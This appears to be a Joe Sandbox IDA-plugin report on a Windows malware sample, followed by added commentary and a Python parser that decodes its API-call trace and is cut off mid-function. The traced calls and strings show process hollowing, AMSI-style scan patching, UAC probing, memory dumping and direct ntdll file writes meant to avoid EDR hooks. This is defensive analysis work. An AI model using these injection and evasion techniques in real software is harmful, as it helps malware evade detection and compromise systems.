                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2774106396-0
APIs
  • Part of subcall function 02AAAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02AAADA3,?,?,02AAAE35,00000000,02AAAF11), ref: 02AAAB30
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02AAAB48
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02AAAB5A
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02AAAB6C
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02AAAB7E
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02AAAB90
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02AAABA2
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02AAABB4
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02AAABC6
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02AAABD8
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02AAABEA
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02AAABFC
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02AAAC0E
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02AAAC20
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02AAAC32
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02AAAC44
  • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02AAAC56
• Process32Next.KERNEL32(?,00000128), ref: 02AAADE9
Similarity
• API ID: AddressProc$HandleModuleNextProcess32
• String ID:
• API String ID: 2237597116-0
APIs
• GetFileAttributesA.KERNEL32(00000000,?,02AB356F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,Initialize), ref: 02A97E8B
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• GetFileAttributesA.KERNEL32(00000000,?,02AB041F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,UacInitialize), ref: 02A97E67
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
APIs
• timeSetEvent.WINMM(00002710,00000000,02ABC350,00000000,00000001), ref: 02ABC36C
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02A91A03,?,02A91FC1), ref: 02A915E2
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02A91FC1), ref: 02A916A4
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
                                                                                                                                          • Opcode ID: c2f27099042f27100ea356a96599bbfd693fa2087500d95e0eb4cc991201113c
                                                                                                                                          • Instruction ID: 3d9f24ee46d72f6e59b50435300233069c9cb45389a5e979da96727eb2fde9f7
                                                                                                                                          • Opcode Fuzzy Hash: c2f27099042f27100ea356a96599bbfd693fa2087500d95e0eb4cc991201113c
                                                                                                                                          • Instruction Fuzzy Hash: 6FF090B2B406956BDB119F5A9C80782BBD8FB00354F450139EA0897340D770A810CB94
                                                                                                                                          APIs
                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02A91FE4), ref: 02A91704
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                          • Opcode ID: 6e50ae1b2243a5eeddcdb09cba0addfc4bb85e0e597caeaff7e0da4a3e8780dc
                                                                                                                                          • Instruction ID: c9eaaeeaff4272fb8a3c24de6ac7b7f91f0cbabbe4af7899f23aee73e1ce9e3f
                                                                                                                                          • Opcode Fuzzy Hash: 6e50ae1b2243a5eeddcdb09cba0addfc4bb85e0e597caeaff7e0da4a3e8780dc
                                                                                                                                          • Instruction Fuzzy Hash: 7BE08675340303AFDF105B7F5DC0712ABDCEB45654F144475F609DB281EA60E8108B60
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02AAADA3,?,?,02AAAE35,00000000,02AAAF11), ref: 02AAAB30
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02AAAB48
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02AAAB5A
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02AAAB6C
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02AAAB7E
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02AAAB90
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02AAABA2
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02AAABB4
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02AAABC6
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02AAABD8
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02AAABEA
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02AAABFC
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02AAAC0E
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02AAAC20
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02AAAC32
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02AAAC44
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02AAAC56
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                          • API String ID: 667068680-597814768
                                                                                                                                          • Opcode ID: 1935f405db749c5ebd26cdd8872e1b50773127ae959ca5e5ad2a4a9bfe56653a
                                                                                                                                          • Instruction ID: 62699a54d2e5993974a9689df525be5fde4726212bf9cbe3159420ceb1dbf006
                                                                                                                                          • Opcode Fuzzy Hash: 1935f405db749c5ebd26cdd8872e1b50773127ae959ca5e5ad2a4a9bfe56653a
                                                                                                                                          • Instruction Fuzzy Hash: 0F31E1B1A80350AFFF04EFA5D995A2977F9FF16B41B800961A901DF206EF78A810DF11
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
                                                                                                                                          • GetThreadContext.KERNEL32(00000000,02B17424,ScanString,02B173A8,02AAA93C,UacInitialize,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,UacInitialize,02B173A8), ref: 02AA9602
                                                                                                                                            • Part of subcall function 02AA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
                                                                                                                                            • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                          • SetThreadContext.KERNEL32(00000000,02B17424,ScanBuffer,02B173A8,02AAA93C,ScanString,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,00000000,-00000008,02B174FC,00000004,02B17500), ref: 02AAA317
                                                                                                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02B17424,ScanBuffer,02B173A8,02AAA93C,ScanString,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,00000000,-00000008,02B174FC), ref: 02AAA324
                                                                                                                                            • Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,UacScan), ref: 02AA8960
                                                                                                                                            • Part of subcall function 02AA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02AA897A
                                                                                                                                            • Part of subcall function 02AA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateLoadProcResumeWrite
                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                          • API String ID: 4000721993-51457883
                                                                                                                                          • Opcode ID: fd2d33c2b4c334cf36cd86e469a5fa0933189f512d148c1e6d445a78892a9356
                                                                                                                                          • Instruction ID: b12685418f47bad6caa1a27bcf5636f0d7963df617d3aebcd806039dbaf8d24d
                                                                                                                                          • Opcode Fuzzy Hash: fd2d33c2b4c334cf36cd86e469a5fa0933189f512d148c1e6d445a78892a9356
                                                                                                                                          • Instruction Fuzzy Hash: B9E2FC75A805189FDF11EB65DE90BCEB3FABF88300F5041A6A109AB215DF30AE46DF51
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
                                                                                                                                          • GetThreadContext.KERNEL32(00000000,02B17424,ScanString,02B173A8,02AAA93C,UacInitialize,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,UacInitialize,02B173A8), ref: 02AA9602
                                                                                                                                            • Part of subcall function 02AA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocateContextFreeLibraryMemoryThreadVirtual
                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                          • API String ID: 2456445956-51457883
                                                                                                                                          • Opcode ID: 223e535379e1b5b1d2bc24540e717359b6eba603e1a1807ade79f050ad194f7f
                                                                                                                                          • Instruction ID: 187467b0ec65d97c4fa071f0a9acecda70833559930dcd559aa3646b4cfa3d75
                                                                                                                                          • Opcode Fuzzy Hash: 223e535379e1b5b1d2bc24540e717359b6eba603e1a1807ade79f050ad194f7f
                                                                                                                                          • Instruction Fuzzy Hash: 11E2EC75A805189FDF11EB65DE90BCEB3FABF88300F5041A6A109AB215DF30AE46DF51
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A95925
                                                                                                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02A9593C
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 02A9596C
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A959D0
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A95A06
                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A95A19
                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A95A2B
                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A95A37
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A96C14,02A90000), ref: 02A95A6B
                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A96C14), ref: 02A95A77
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02A95A99
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                                                          • Opcode ID: 3846bbb7254ff08ee6c491d5144b013fc0687426d454b0347b3fd0b2d0de760e
                                                                                                                                          • Instruction ID: 1e7dd25d4c03343320870832b3c470f33c54189609cd0c3ac7ad3ae35d26932d
                                                                                                                                          • Opcode Fuzzy Hash: 3846bbb7254ff08ee6c491d5144b013fc0687426d454b0347b3fd0b2d0de760e
                                                                                                                                          • Instruction Fuzzy Hash: DB417C71D4021AAFDF11EBEACDC9ADEB3FDAB08350F5445A5A148E7241EB309A448F54
                                                                                                                                          APIs
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A95BE8
                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A95BF5
                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A95BFB
                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A95C26
                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A95C6D
                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A95C7D
                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A95CA5
                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A95CB5
                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A95CDB
                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A95CEB
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                          • API String ID: 1599918012-2375825460
                                                                                                                                          • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                          • Instruction ID: 9f09ea6d198fe9b3f28049ffbb9fc4b3ad6b2bb02c5de019e932296389eac57c
                                                                                                                                          • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                          • Instruction Fuzzy Hash: 37318671E4026D29EF26D6B58CC6BDEB7ED9B04384F4401A19608E6181EE749A44CF50
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02A94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A94F2E
                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02AADD5E), ref: 02AADCCB
                                                                                                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02AADD05
                                                                                                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02AADD32
                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02AADD3B
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3764614163-0
                                                                                                                                          • Opcode ID: a2a46616abd754487583454b86adb4276582f0573961cf32d0796d19636838e8
                                                                                                                                          • Instruction ID: 97c16740fed6c8e4612d3f83138f6273a7159c055687055bd3fd5dac0d609fff
                                                                                                                                          • Opcode Fuzzy Hash: a2a46616abd754487583454b86adb4276582f0573961cf32d0796d19636838e8
                                                                                                                                          • Instruction Fuzzy Hash: BD21EE71A81609BEEB10EA94CD52FDEB7BDEF08B04F514461B600F75C0DBB46A058B64
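The two records above are worth reading together. The lstrcpynA / GetThreadLocale / GetLocaleInfoA(LOCALE_SABBREVLANGNAME = 3) / LoadLibraryExA(flags = 2, LOAD_LIBRARY_AS_DATAFILE) sequence under Software\Borland\Delphi\Locales is the Delphi RTL's resource-module lookup, so it is runtime scaffolding rather than payload logic; the interesting record is the one that resolves RtlDosPathNameToNtPathName_U, NtCreateFile, NtWriteFile and NtClose directly from ntdll (the ".N" module tag) and writes a file without touching kernel32, which is the behaviour behind the report's "direct / indirect syscall" signature. The following parser is an added example, not part of the Joe Sandbox report or its plugin: it takes trace lines in the format shown above (four lines copied from these records are embedded as constructed sample input), splits the argument list, flags native calls, and decodes the NtCreateFile access, share, disposition and create-option values and the LoadLibraryExA flags. It assumes that the leading entries of the report's argument list are the call's parameters in order and that the trailing entries are stack residue from the caller's frame; the flag tables are standard Windows SDK values.

```python
import json
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: four call-trace lines copied from the function
# records of this report (Delphi locale-resource lookup, then the native
# create/write/close sequence). The code below is added example code.
SAMPLE_TRACE = [
    r"• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A95C7D",
    r"• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02AADD05",
    r"• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02AADD32",
    r"• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02AADD3B",
]

# Standard SDK constants used by the decoders.
ACCESS = {0x1: "FILE_READ_DATA", 0x2: "FILE_WRITE_DATA", 0x4: "FILE_APPEND_DATA",
          0x80: "FILE_READ_ATTRIBUTES", 0x100: "FILE_WRITE_ATTRIBUTES", 0x10000: "DELETE",
          0x100000: "SYNCHRONIZE", 0x40000000: "GENERIC_WRITE", 0x80000000: "GENERIC_READ"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {0: "FILE_SUPERSEDE", 1: "FILE_OPEN", 2: "FILE_CREATE", 3: "FILE_OPEN_IF",
               4: "FILE_OVERWRITE", 5: "FILE_OVERWRITE_IF"}
CREATE_OPTIONS = {0x1: "FILE_DIRECTORY_FILE", 0x2: "FILE_WRITE_THROUGH",
                  0x20: "FILE_SYNCHRONOUS_IO_NONALERT", 0x40: "FILE_NON_DIRECTORY_FILE",
                  0x1000: "FILE_DELETE_ON_CLOSE"}
LOADLIB = {0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
           0x8: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x10: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
           0x20: "LOAD_LIBRARY_AS_IMAGE_RESOURCE", 0x40: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE"}

LINE_RE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class Call:
    api: str
    module: str            # "N" is the report's tag for a call resolved directly from ntdll
    args: List[object]     # int for hex words, None for "?", str for stack strings
    ref: int

    @property
    def native(self) -> bool:
        return self.module == "N"


def parse_line(line: str) -> Optional[Call]:
    """Parse one '• Api.Module(args), ref: addr' line; returns None for other lines."""
    m = LINE_RE.search(line)
    if not m:
        return None
    args: List[object] = []
    for tok in m.group("args").split(","):
        tok = tok.strip()
        if tok == "?":
            args.append(None)
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
            args.append(int(tok, 16))
        else:
            args.append(tok)
    return Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16))


def _flags(value: Optional[int], names: Dict[int, str]) -> List[str]:
    """Expand a bitmask into known flag names; unknown bits are kept as raw hex."""
    if value is None:
        return ["?"]
    out = [name for bit, name in sorted(names.items()) if value & bit]
    rest = value & ~sum(names)
    if rest:
        out.append(f"0x{rest:X}")
    return out


def decode(call: Call) -> Dict[str, object]:
    """Decode the parameters an analyst cares about. Assumption (hypothetical, not
    stated by the report): leading argument entries are the real parameters in order."""
    a = call.args
    if call.api == "NtCreateFile" and len(a) >= 9:
        return {
            "DesiredAccess": _flags(a[1], ACCESS),
            "ShareAccess": _flags(a[6], SHARE),
            "CreateDisposition": "?" if a[7] is None else DISPOSITION.get(a[7], f"0x{a[7]:X}"),
            "CreateOptions": _flags(a[8], CREATE_OPTIONS),
        }
    if call.api == "LoadLibraryExA" and len(a) >= 3:
        return {"dwFlags": _flags(a[2], LOADLIB),
                "stack_strings": [s for s in a if isinstance(s, str)]}
    return {}


def summarize(lines: List[str]) -> Dict[str, object]:
    """Call sequence, native (ntdll) calls, and decoded parameters for a record."""
    calls = [c for c in map(parse_line, lines) if c]
    native = [c.api for c in calls if c.native]
    return {
        "sequence": [c.api for c in calls],
        "native_calls": native,
        # file written through ntdll only, bypassing the kernel32 layer EDR hooks usually sit on
        "native_file_write": {"NtCreateFile", "NtWriteFile"} <= set(native),
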